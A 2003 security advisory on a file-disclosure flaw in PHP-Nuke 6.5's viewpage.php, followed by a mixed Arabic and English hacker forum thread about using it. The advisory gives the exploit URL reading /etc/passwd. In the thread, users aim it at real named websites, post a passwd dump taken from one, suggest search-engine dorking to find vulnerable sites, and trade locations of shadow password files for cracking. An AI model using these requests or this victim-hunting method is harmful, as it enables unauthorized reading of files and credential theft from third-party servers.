PHP-Nuke Input Validation Flaw in 'viewpage.php' Discloses Files on the System to Remote Users

SecurityTracker Alert ID: 1006377
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Updated: Mar 26 2003

Original Entry Date: Mar 25 2003

Impact: Disclosure of system information, Disclosure of user information

Exploit Included: Yes

Version(s): 6.5

Description: An input validation flaw vulnerability was reported in PHP-Nuke. A remote user can view files on the system that are readable by the web server.

It is reported that a remote user can specify a file name via the 'viewpage.php' script to read the file with the privileges of the web server process:

http://[target]/viewpage.php?file=/etc/passwd

Impact: A remote user can view specified files on the system with the privileges of the web server.

Solution: No solution was available at the time of this entry.

Vendor URL: www.phpnuke.org/ (Links to External Site)

Example:

http://server.com/viewpage.php?file=/etc/passwd


|4||4||4||4||4|

OR
I think there is a proplem with this exploit or with me

I tried it on this site

http://www.thebix.com/viewpage.php?file=/etc/passwd

but there is not any result

i hope 2 discuse it here

c ya

bye

|also really it is very nice to discuse the exploit here , also is you said my dear hi hacker , may there is a problem and i did try it but i did not become any thing , anyway i did read that thid Script allows an attacker to view all files on the System and it is as may you know a part of PHPNuke . but i do not think that it is too easy to get it , i think there is a trik to get it and i will search now , may there are a new infos about it

anyway i did try it and will try again and hope that all discuse with us to get it


with my greazzzzzzzz

|4||4||4||4|

umm, what version of phpNuke is vulnerable to this? this is the qustion and as you see my bro , there has not been any viewpage.php since before 5.0 , I beleive it must work on the PHP-Nuke 6.5 and the site you tried on , sit not running on PHP , also we have to find a site running on PHP-Nuke 6.5.


i search but i did not find any one till yet :confused::confused::confused:

may you help me |4||4||4||4||4|

Also salam again brothers,

i put this exploit but only hi hacker did write about it , also i douno but i wanna understand it , also i have searched about it in net but this is new and i did not found , let us try togather
also go to www.google.com and search the viewpage.php?file= , you see many site , also now let us take this site
http://www.finalturn.com/viewpage.php?file=privacy.php also now to use this exploit delete the privacy.php and put /etc/passwd , now you get the the passwd as this

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/dev/null rpm:x:37:37::/var/lib/rpm:/bin/bash rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/bin/false ident:x:98:98:pident user:/:/sbin/nologin radvd:x:75:75:radvd user:/:/bin/false pcap:x:77:77::/var/arpwatch:/sbin/nologin mysql:x:100:101:MySQL server:/var/lib/mysql:/bin/bash

and more , also to discuse that ,
the root is root |4||4| , also look at the color X , this is the password of the admin but it is shadow , (( modala )) , we have to find the Shadow file to get the shadow pass and to crack it , but my Qustion where can i find the shadow file , :confused::confused:

as i know , we can get the shadow file in /etc/shadow and /etc/master.passwd and /etc/security/passwd , also i do not know more place for the shdow , may you can help me if any one knows |4||4||4||4| ;


thats all ,

شكراَ يا اخي وهذه الثغرة زبطط على المجلة الخاص بي وسلؤال لماذا تتكلمون بلغة الانجليزية
مع انني فهمة الموضوع |3||3||3||3|
شكراَ
واكرر اسفي لك

also sorry i forgpotten to say , that you try the link to get the shadow . unter this link http://www.finalturn.com/viewpage.php?file=/etc/shadow

you will get ..... failed to create stream: Permission denied thats mean the shadow is here put forbidden , but another site you can not open the shadow , thats mean there are another places for the shadow

i need them

it is ok bro , we still brothers walaw |4||4||4| but i douno why i write english , really i have no arabic keyboard and i write 3ala al 3ama |4||4| so that asra3 fee al english

as i said you douna need to say sorry , we still allways brother and i respect ur choice |4||4||4|

ok my brother

i'm writing by english 2 practice my english and 2 imrove it , coz we live in arabian countries , not like my bro linux hacker , he always speak english and his language is Excelent

and i'm sorry , that i wasn't with u 4 tring this exploit , but i'll , promise u

bye

كاتب الرسالة الأصلية dtwrap2003
شكراَ يا اخي وهذه الثغرة زبطط على المجلة الخاص بي وسلؤال لماذا تتكلمون بلغة الانجليزية
مع انني فهمة الموضوع |3||3||3||3|
شكراَ
واكرر اسفي لك

tamam wallah >> teeb momken tetrgem lana esh kalooo
shoof ana aktoob english laken be alarabi :p

كاتب الرسالة الأصلية قبلة الموت
tamam wallah >> teeb momken tetrgem lana esh kalooo
shoof ana aktoob english laken be alarabi :p


|4||4||4||4||4|

i love yours subgicts

but all arab how don't speack English cant now what are u say
:rolleyes::rolleyes:

Hi all >>> i will try writting english with you
so i was looking for PHP-Nuke 6.5 . when get any site in the reasults and try it i can't find any reasults like you ( lunix :( why
http://www.thebix.com/viewpage.php?file=/etc/passwd
what do you mean about ( viewpage.php ) ??? i can't understant it


so all my brothers
i'm not good in english > :D
but i want try with you

كوووووووووووووووووووووووه حولنا عربي .......... هذه ثغره ضهرت قبل شهر .. الثغره تمكنك من فتح مجلد الباسورد .. لكن الباسورد بكون مضلل في المجلد etc/passwd ومشان تحصل علي الباسورد لازم تفتح الملف etc/shadow وبمل انك خبييييييييييييير هلا بتعرف انه ما بتقدر تفتحه الملف لانك مش رووت .. وتم ترقيع الثغره

اعتقد فهمت علي ..
:D:D:D:D:D:D

أيوة فهمت عليك . ;)